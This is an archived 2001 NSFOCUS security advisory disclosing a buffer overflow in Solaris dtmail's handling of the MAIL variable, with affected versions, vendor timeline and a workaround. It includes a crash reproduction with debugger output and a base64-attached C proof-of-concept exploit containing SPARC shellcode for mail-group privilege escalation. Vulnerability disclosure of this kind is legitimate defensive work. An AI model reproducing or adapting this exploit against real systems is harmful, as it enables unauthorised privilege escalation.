Date: Tue, 24 Jul 2001 19:29:35 +0800
From: Nsfocus Security Team <[email protected]>
To: "[email protected]" <[email protected]>
Subject: NSFOCUS SA2001-04 : Solaris dtmail Buffer Overflow Vulnerability
--=====_Dragon441788518446_=====
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
NSFOCUS Security Advisory(SA2001-04)
Topic: Solaris dtmail Buffer Overflow Vulnerability
Release Date=A3=BA 2001-7-24
CVE CAN ID : CAN-2001-0548
BUGTRAQ ID : 3081
Affected system:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Sun Solaris 2.6 (SPARC/x86)
Sun Solaris 7 (SPARC/x86)
Not affected system:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Sun Solaris 8
Impact:
=3D=3D=3D=3D=3D=3D=3D=3D=3D
NSFOCUS Security Team has found a buffer overflow vulnerability=
in the dtmail
of Solaris handling MAIL environment variable, exploitation of=
which could
allow an attacker to run arbitrary code with the privilege of=
mail group.
Description=A3=BA
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
dtmail is a mail user agent (MUA) shipped as a part of Solaris=
CDE. It is
installed setgid mail by default.
The vulnerability results because dtmail do not provide valid=
boundary check
to certain environment variables, which allows an attacker to=
launch a buffer
overflow attack.
In case that the MAIL environment variable is a over-length=
character string
(for instance, longer than 1500 bytes), a stack buffer overflow=
would occur.
The attacker could overwrite the returned address and run=
arbitrary code with
mail group privilege.
Exploit:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
[test@ /tmp]> uname -a
SunOS sun27 5.7 Generic_106541-08 sun4u sparc SUNW,Ultra-5_10
[test@ /tmp]> showrev -p|grep 107200-12
Patch: 107200-12 Obsoletes: Requires: 108374-01, 107887-08=
Incompatibles:
Packages: SUNWdtdst, SUNWdtma
[test@ /tmp]> ls -l /usr/dt/bin/dtmail
-r-xr-sr-x 1 bin mail 1553244 Jun 12 2001=
/usr/dt/bin/dtmail*
[test@ /tmp]> cp /usr/dt/bin/dtmail .
[test@ /tmp]> export DISPLAY=3D127.0.0.1:0.0
[test@ /tmp]> MAIL=3D`perl -e 'print "A"x2000'`; export MAIL
[test@ /tmp]> ulimit -c 200000
[test@ /tmp]> /usr/dt/bin/ttsession -s -c ./dtmail
[A dtmail dialog box would prompt out in your X window, click=
"Local"]
[test@ /tmp]> ls -l core
-rw------- 1 test users 1991892 Jun 22 11:47 core
[test@ /tmp]> dbx ./dtmail ./core
...
Reading dtmail
core file header read successfully
Reading ld.so.1
Reading libSDtMail.so.2
Reading libnsl.so.1
Reading libsocket.so.1
....
Reading libXext.so.0
Reading libc_psr.so.1
detected a multithreaded program
t@1 (l@1) terminated by signal BUS (invalid address alignment)
dbx: core file read error: address 0x41414161 not in data space
dbx: attempt to read stack failed - bad frame pointer
0x001013e4: solaris_valid+0x002c: ret
(/opt/SUNWspro/bin/../WS5.0/bin/sparcv9/dbx)
There is a proof of concept code for this issue:
http://www.nsfocus.com/proof/sol_sparc_dtmail_MAIL_ex.c
Workaround:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Drop the sgid mail attribute of dtmail:
# chmod g-s /usr/dt/bin/dtmail
Vendor Status:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
2001.6.18 We have informed Sun of this issue.
2001.6.21 Sun replied that the overflow would occur even in case=
that the MAIL
environment variable has only 1 byte.
2001.6.22 We have reported our testing result, but do not=
receive any reply up
to now.
Solaris 2.6 with the following patches is not affected:
SunOS 5.6 SPARC : 105338-27
SunOS 5.6 x86 : 105339-25
Solaris 7 with the following latest patches is still affected:
SunOS 5.7 SPARC : 107200-12
SunOS 5.7 x86 : 107201-12
Solaris 8 is not affected.
Security patches of Sun Inc. are available at:
http://sunsolve.sun.com/securitypatch
Additional Information:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
The Common Vulnerabilities and Exposures (CVE) project has
assigned the name CAN-2001-0548 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org),
which standardizes names for security problems. Candidates
may change significantly before they become official CVE=
entries.
DISCLAIMS:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT=
WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR=
IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL=
NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,=
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL=
DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH=
DAMAGES.
DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT=
THE
ADVISORY IS NOT MODIFIED IN ANY WAY.
Copyright 1999-2001 NSFOCUS. All Rights Reserved. Terms of use.
NSFOCUS Security Team <[email protected]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)
--=====_Dragon441788518446_=====
Content-Type: application/octet-stream; name="sol_sparc_dtmail_MAIL_ex.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="sol_sparc_dtmail_MAIL_ex.c"
LyoNCiAqICBzb2xfc3BhcmNfZHRtYWlsX01BSUxfZXguYyAtIFByb29mIG9mIENvbmNlcHQgQ29k
ZSBmb3IgZHRtYWlsICRNQUlMIG92ZXJmbG93IGJ1Zy4NCiAqDQogKiAgQ29weXJpZ2h0IChjKSAy
MDAxIC0gTnNmb2N1cy5jb20NCiAqDQogKiAgSXQgd2lsbCBydW4gIi9iaW4vaWQiIGlmIHRoZSBl
eHBsb2l0IHN1Y2NlZWQuDQogKiAgVGVzdGVkIGluIFNvbGFyaXMgMi42LzcgKFNQQVJDKS4NCiAq
DQogKiAgRElTQ0xBSU1TOg0KICogIFRoaXMgIGlzIGEgcHJvb2Ygb2YgY29uY2VwdCBjb2RlLiAg
VGhpcyBjb2RlIGlzIGZvciB0ZXN0IHB1cnBvc2UgDQogKiAgb25seSBhbmQgc2hvdWxkIG5vdCBi
ZSBydW4gYWdhaW5zdCBhbnkgaG9zdCB3aXRob3V0IHBlcm1pc3Npb24gZnJvbSANCiAqICB0aGUg
c3lzdGVtIGFkbWluaXN0cmF0b3IuDQogKiANCiAqICBOU0ZPQ1VTIFNlY3VyaXR5IFRlYW0gPHNl
Y3VyaXR5QG5zZm9jdXMuY29tPg0KICogIGh0dHA6Ly93d3cubnNmb2N1cy5jb20NCiAqLw0KIA0K
I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8c3lzL3N5
c3RlbWluZm8uaD4NCiNpbmNsdWRlIDxwd2QuaD4NCg0Kc3RydWN0IHBhc3N3ZCAgKnB3ZDs7DQoN
CiNkZWZpbmUgU1AgICAgICAweGZmYmVmZmZjICAgICAgLyogZGVmYXVsdCBib3R0b20gc3RhY2sg
YWRkcmVzcyAoU29sYXJpcyA3LzgpICovDQoNCiNkZWZpbmUgRElTUEVOViAiRElTUExBWT0xMjcu
MC4wLjE6MC4wIg0KDQojZGVmaW5lIFZVTFBST0cgIi91c3IvZHQvYmluL2R0bWFpbCINCiNkZWZp
bmUgTk9QICAgICAweGFhMWQ0MDE1ICAgICAgLyogInhvciAlbDUsICVsNSwgJWw1IiAqLw0KDQoN
CmNoYXIgICAgICAgICAgICBzaGVsbGNvZGVbXSA9ICAgDQoiXHg5MFx4MDhceDNmXHhmZlx4OTBc
eDAyXHgyMFx4MDZceDgyXHgxMFx4MjBceDg4XHg5MVx4ZDBceDIwXHgwOCIgDQoiXHg5MFx4MDhc
eDNmXHhmZlx4OTBceDAyXHgyMFx4MDZceDgyXHgxMFx4MjBceDJlXHg5MVx4ZDBceDIwXHgwOCIg
DQoiXHgyZFx4MGJceGQ4XHg5YVx4YWNceDE1XHhhMVx4NmVceDJmXHgwYlx4ZGFceDU5XHg5MFx4
MGJceDgwXHgwZSINCiJceDkyXHgwM1x4YTBceDBjXHg5NFx4MWFceDgwXHgwYVx4OWNceDAzXHhh
MFx4MTRceGVjXHgzYlx4YmZceGVjIg0KIlx4YzBceDIzXHhiZlx4ZjRceGRjXHgyM1x4YmZceGY4
XHhjMFx4MjNceGJmXHhmY1x4ODJceDEwXHgyMFx4M2IiDQoiXHg5MVx4ZDBceDIwXHgwOFx4OTBc
eDFiXHhjMFx4MGZceDgyXHgxMFx4MjBceDAxXHg5MVx4ZDBceDIwXHgwOCI7DQoNCi8qIGdldCBj
dXJyZW50IHN0YWNrIHBvaW50IGFkZHJlc3MgKi8NCmxvbmcNCmdldF9zcCh2b2lkKQ0Kew0KICAg
ICAgICBfX2FzbV9fKCJtb3YgJXNwLCVpMCIpOw0KfQ0KDQpsb25nDQpnZXRfc2hlbGxhZGRyKGxv
bmcgc3BfYWRkciwgY2hhciAqKmFyZywgY2hhciAqKmVudiwgbG9uZyBvZmYpDQp7DQogICAgICAg
IGxvbmcgICAgICAgICAgICByZXRhZGRyOw0KICAgICAgICBpbnQgICAgICAgICAgICAgaTsNCiAg
ICAgICAgY2hhciAgICAgICAgICAgIHBsYXRbMjU2XTsNCiAgICAgICAgY2hhciAgICAgICAgICAg
IHBhZCA9IDAsIHBhZDEgPSAwLCBwYWQyOw0KICAgICAgICBpbnQgICAgICAgICAgICAgZW52X2xl
biwgYXJnX2xlbiwgbGVuOw0KDQogICAgICAgIHdoaWxlICgxKSB7DQogICAgICAgICAgICAgICAg
LyogY2FsY3VsYXRlIHRoZSBsZW5ndGggb2YgIlZVTFBST0ciICsgYXJndltdICovDQogICAgICAg
ICAgICAgICAgZm9yIChpID0gMCwgYXJnX2xlbiA9IDA7IGFyZ1tpXSAhPSBOVUxMOyBpKyspIHsN
CiAgICAgICAgICAgICAgICAgICAgICAgIGFyZ19sZW4gKz0gc3RybGVuKGFyZ1tpXSkgKyAxOw0K
ICAgICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAvKiBjYWxjdWxhdGUgdGhlIHBh
ZCBudW1tYmVyIC4gKi8NCiAgICAgICAgICAgICAgICBwYWQgPSAzIC0gYXJnX2xlbiAlIDQ7DQoN
CiAgICAgICAgICAgICAgICBtZW1zZXQoZW52WzBdLCAnQScsIHBhZCk7DQogICAgICAgICAgICAg
ICAgZW52WzBdW3BhZF0gPSAnXDAnOw0KDQogICAgICAgICAgICAgICAgbWVtc2V0KGVudlsyXSwg
J0EnLCBwYWQxKTsNCiAgICAgICAgICAgICAgICBlbnZbMl1bcGFkMV0gPSAnXDAnOw0KDQogICAg
ICAgICAgICAgICAgLyogZ2V0IGVudmlyb24gbGVuZ3RoICovDQogICAgICAgICAgICAgICAgZm9y
IChpID0gMCwgZW52X2xlbiA9IDA7IGVudltpXSAhPSBOVUxMOyBpKyspIHsNCiAgICAgICAgICAg
ICAgICAgICAgICAgIGVudl9sZW4gKz0gc3RybGVuKGVudltpXSkgKyAxOw0KICAgICAgICAgICAg
ICAgICB9DQoNCiAgICAgICAgICAgICAgICAvKiBnZXQgcGxhdGZvcm0gaW5mbyAgKi8NCiAgICAg
ICAgICAgICAgICBzeXNpbmZvKFNJX1BMQVRGT1JNLCBwbGF0LCAyNTYpOw0KDQogICAgICAgICAg
ICAgICAgbGVuID0gYXJnX2xlbiArIGVudl9sZW4gKyBzdHJsZW4ocGxhdCkgKyAxICsgc3RybGVu
KFZVTFBST0cpICsgMTsNCg0KICAgICAgICAgICAgICAgIHBhZDIgPSA0IC0gbGVuICUgNDsNCg0K
ICAgICAgICAgICAgICAgIC8qIGdldCB0aGUgZXhhY3Qgc2hlbGxjb2RlIGFkZHJlc3MgKi8NCiAg
ICAgICAgICAgICAgICByZXRhZGRyID0gc3BfYWRkciAtIHBhZDIgICAgICAgIC8qIHRoZSB0cmFp
bGluZyB6ZXJvIG51bWJlciAqLw0KICAgICAgICAgICAgICAgICAgICAgICAgLSBzdHJsZW4oVlVM
UFJPRykgLSAxDQogICAgICAgICAgICAgICAgICAgICAgICAtIHN0cmxlbihwbGF0KSAtIDE7DQoN
CiAgICAgICAgICAgICAgICBmb3IgKGktLTsgaSA+IDA7IGktLSkNCiAgICAgICAgICAgICAgICAg
ICAgICAgIHJldGFkZHIgLT0gc3RybGVuKGVudltpXSkgKyAxOw0KDQogICAgICAgICAgICAgICAg
aWYgKCEoKHJldGFkZHIgKyBvZmYpICYgMHhmZikpIHsNCiAgICAgICAgICAgICAgICAgICAgICAg
IHBhZDEgKz0gODsNCiAgICAgICAgICAgICAgICAgICAgICAgIGNvbnRpbnVlOw0KICAgICAgICAg
ICAgICAgIH0gZWxzZSBpZiAoKHJldGFkZHIgKyBvZmYpICUgOCkgew0KICAgICAgICAgICAgICAg
ICAgICAgICAgcGFkMSArPSA0Ow0KICAgICAgICAgICAgICAgICAgICAgICAgY29udGludWU7DQog
ICAgICAgICAgICAgICAgfSBlbHNlDQogICAgICAgICAgICAgICAgICAgICAgICBicmVhazsNCiAg
ICAgICAgfQ0KICAgICAgICByZXR1cm4gcmV0YWRkcjsNCg0KfSAvKiBFbmQgb2YgZ2V0X3NoZWxs
YWRkciAqLw0KDQoNCmludA0KbWFpbihpbnQgYXJnYywgY2hhciAqKmFyZ3YpDQp7DQogICAgICAg
IGNoYXIgICAgICAgICAgICBidWZbNDA5Nl0sIGhvbWVbMTI4XSwgZGlzcGxheVsyNTZdOw0KICAg
ICAgICBjaGFyICAgICAgICAgICAgZWdnYnVmWzIwNDhdOw0KICAgICAgICBsb25nICAgICAgICAg
ICAgcmV0YWRkciwgc3BfYWRkciA9IFNQOw0KICAgICAgICBjaGFyICAgICAgICAgICAqYXJnWzI0
XSwgKmVudlsyNF0sICpjd2QsICpjaGFycHRyOw0KICAgICAgICBjaGFyICAgICAgICAgICAgcGFk
ZGluZ1s2NF0sIHBhZGRpbmcxWzY0XTsNCiAgICAgICAgdW5zaWduZWQgaW50ICAgKnB0cjsNCiAg
ICAgICAgY2hhciAgICAgICAgICAgKmRpc3A7DQogICAgICAgIGNoYXIgICAgICAgICAgICBldjFb
XSA9ICJNQUlMPSI7DQogICAgICAgIGxvbmcgICAgICAgICAgICBldjFfbGVuLCBpLCBhbGlnbjsN
CiAgICAgICAgbG9uZyAgICAgICAgICAgIG92ZXJidWZsZW4gPSAyMDQ4Ow0KDQogICAgICAgIGlm
IChhcmdjID4gMSkNCiAgICAgICAgICAgICAgICBzbnByaW50ZihkaXNwbGF5LCBzaXplb2YoZGlz
cGxheSkgLSAxLCAiRElTUExBWT0lcyIsIGFyZ3ZbMV0pOw0KICAgICAgICBlbHNlIHsNCiAgICAg
ICAgICAgICAgICBkaXNwID0gZ2V0ZW52KCJESVNQTEFZIik7DQogICAgICAgICAgICAgICAgaWYg
KGRpc3ApDQogICAgICAgICAgICAgICAgICAgICAgICBzbnByaW50ZihkaXNwbGF5LCBzaXplb2Yo
ZGlzcGxheSkgLSAxLCAiRElTUExBWT0lcyIsIGRpc3ApOw0KICAgICAgICAgICAgICAgIGVsc2UN
CiAgICAgICAgICAgICAgICAgICAgICAgIHN0cm5jcHkoZGlzcGxheSwgRElTUEVOViwgc2l6ZW9m
KGRpc3BsYXkpIC0gMSk7DQogICAgICAgIH0NCg0KICAgICAgICBwd2QgPSBnZXRwd3VpZCgodWlk
X3QpIGdldHVpZCgpKTsNCiAgICAgICAgc25wcmludGYoaG9tZSwgMTI3LCAiSE9NRT0lcyIsIHN0
cmR1cChwd2QtPnB3X2RpcikpOw0KDQogICAgICAgIGFyZ1swXSA9IFZVTFBST0c7DQogICAgICAg
IGFyZ1sxXSA9IE5VTEw7DQoNCiAgICAgICAgY3dkID0gZ2V0Y3dkKChjaGFyICopIE5VTEwsIDI1
Nik7DQogICAgICAgIG92ZXJidWZsZW4gPSBvdmVyYnVmbGVuIC0gKHN0cmxlbihjd2QpICsgc3Ry
bGVuKCIvIikpOw0KICAgICAgICBldjFfbGVuID0gc3RybGVuKGV2MSk7DQogICAgICAgIGJ6ZXJv
KGJ1Ziwgc2l6ZW9mKGJ1ZikpOw0KICAgICAgICBtZW1jcHkoYnVmLCBldjEsIGV2MV9sZW4pOw0K
ICAgICAgICBtZW1zZXQoYnVmICsgZXYxX2xlbiwgJ0EnLCBvdmVyYnVmbGVuKTsNCg0KICAgICAg
ICBiemVybyhlZ2didWYsIHNpemVvZihlZ2didWYpKTsNCiAgICAgICAgcHRyID0gKHVuc2lnbmVk
IGludCAqKSBlZ2didWY7DQogICAgICAgIGZvciAoaSA9IDA7IGkgPCBzaXplb2YoZWdnYnVmKSAt
IHN0cmxlbihzaGVsbGNvZGUpOyBpICs9IDQpDQogICAgICAgICAgICAgICAgKihwdHIgKyBpIC8g
NCkgPSBOT1A7DQogICAgICAgIG1lbWNweShlZ2didWYgKyBpIC0gNCwgc2hlbGxjb2RlLCBzdHJs
ZW4oc2hlbGxjb2RlKSk7DQoNCiAgICAgICAgZW52WzBdID0gcGFkZGluZzsgICAgICAgLyogcHV0
IHBhZGRpbmcgYnVmZmVyIGluIGVudiAqLw0KICAgICAgICBlbnZbMV0gPSBlZ2didWY7ICAgICAg
ICAvKiBwdXQgc2hlbGxjb2RlIGluIGVudiAqLw0KICAgICAgICBlbnZbMl0gPSBwYWRkaW5nMTsg
ICAgICAvKiBwdXQgcGFkZGluZzEgYnVmZmVyIGluIGVudiAqLw0KICAgICAgICBlbnZbM10gPSBi
dWY7ICAgICAgICAgICAvKiBwdXQgb3ZlcmZsb3cgZW52aXJvbiAqLw0KICAgICAgICBlbnZbNF0g
PSBkaXNwbGF5OyAgICAgICAvKiBwdXQgZGlzcGxheSBlbnZpcm9uICovDQogICAgICAgIGVudls1
XSA9IGhvbWU7ICAgICAgICAgIC8qIHB1dCBob21lIGVudmlyb24gKi8NCiAgICAgICAgZW52WzZd
ID0gTlVMTDsgICAgICAgICAgLyogZW5kIG9mIGVudiAqLw0KDQogICAgICAgIC8qIGdldCBzdGFj
ayBib3R0b20gYWRkcmVzcyAqLw0KICAgICAgICBpZiAoKCh1bnNpZ25lZCBjaGFyKSAoZ2V0X3Nw
KCkgPj4gMjQpKSA9PSAweGVmKSB7ICAgICAgIC8qIFNvbGFyaXMgMi42ICovDQogICAgICAgICAg
ICAgICAgc3BfYWRkciA9IFNQIC0gMHgwZmJmMDAwMDsNCiAgICAgICAgfQ0KICAgICAgICByZXRh
ZGRyID0gZ2V0X3NoZWxsYWRkcihzcF9hZGRyLCBhcmcsIGVudiwgLTgpOw0KDQogICAgICAgIHJl
dGFkZHIgLT0gODsNCiAgICAgICAgcHJpbnRmKCJVc2luZyAgcmV0dXJuIGFkZHJlc3MgPSAweCV4
IChzaGVsbGFkZHJyIC0gOClcbiIsIHJldGFkZHIpOw0KICAgICAgICBwcmludGYoIkNsaWNrIExv
Y2FsIGluIHlvdXIgWCB3aW5kb3dcblxuIik7DQoNCiAgICAgICAgY2hhcnB0ciA9IChjaGFyICop
ICZyZXRhZGRyOw0KICAgICAgICBhbGlnbiA9IDQgLSAoKHN0cmxlbihjd2QpICsgc3RybGVuKCIv
IikpICUgNCk7DQogICAgICAgIGZvciAoaSA9IDA7IGkgPCBvdmVyYnVmbGVuIC0gYWxpZ247IGkr
KykNCiAgICAgICAgICAgICAgICBidWZbZXYxX2xlbiArIGFsaWduICsgaV0gPSAqKGNoYXJwdHIg
KyBpICUgNCk7DQoNCg0KICAgICAgICBleGVjdmUoVlVMUFJPRywgYXJnLCBlbnYpOw0KICAgICAg
ICBwZXJyb3IoImV4ZWNsZSIpOw0KfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAvKiBF
bmQgb2YgbWFpbiAqLw==
--=====_Dragon441788518446_=====--
